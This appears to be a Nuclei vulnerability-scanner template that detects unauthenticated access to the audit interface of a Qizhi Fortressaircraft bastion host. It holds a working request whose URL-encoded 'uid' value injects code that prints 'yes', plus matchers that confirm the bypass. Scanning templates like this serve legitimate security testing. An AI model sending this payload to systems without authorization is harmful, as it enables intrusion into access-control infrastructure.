id: qizhi-fortressaircraft-unauth info: name: Qizhi Fortressaircraft Unauthorized Access author: ritikchaddha severity: high reference: - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw metadata: max-request: 1 tags: qizhi,fortressaircraft,unauth http: - method: GET path: - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm" matchers-condition: and matchers: - type: word part: body words: - "错误的id" - "审计管理员" - "事件审计" condition: and - type: status status: - 200 # digest: 4a0a00473045022039f08fcb576c6ea8910c43c6363c8dcb39fe40ae0d0fcbc8635e61ecf0ce7413022100c0c9e21aab321b6e9620a983619380111a29cb5c71c325a35db6da4b4757a35e:922c64590222798bb761d5b6d8e72950